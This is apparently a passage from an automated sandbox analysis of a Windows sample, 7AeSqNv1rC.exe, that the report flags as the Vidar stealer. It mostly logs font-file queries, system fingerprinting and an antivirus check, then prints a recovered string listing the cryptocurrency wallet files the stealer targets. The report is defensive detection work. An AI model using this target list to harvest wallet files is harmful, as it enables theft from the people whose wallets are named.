                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,4_2_0041C0E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,4_2_00410C53
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_00410D2E
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.0000000001170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected MicroClip
                        Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2472, type: MEMORYSTR
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: InstallUtil.exe, 00000004.00000002.2454730530.0000000000F51000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
